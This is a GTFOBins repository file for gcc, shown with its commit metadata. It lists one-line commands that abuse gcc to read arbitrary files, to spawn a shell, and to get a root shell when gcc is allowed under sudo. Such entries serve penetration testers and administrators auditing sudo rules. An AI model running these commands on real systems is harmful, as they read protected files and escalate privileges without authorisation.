GTFOBins.github.io/_gtfobins/gcc.md
Andrea Cardaci 04b29456a6 Add gcc file read
This is an improved version with respect to #138.

Close #138.
2020-09-27 11:29:28 +02:00

12 lines
200 B
Markdown

---
functions:
file-read:
- code: |
LFILE=file_to_read
gcc -x c -E "$LFILE"
shell:
- code: gcc -wrapper /bin/sh,-s .
sudo:
- code: sudo gcc -wrapper /bin/sh,-s .
---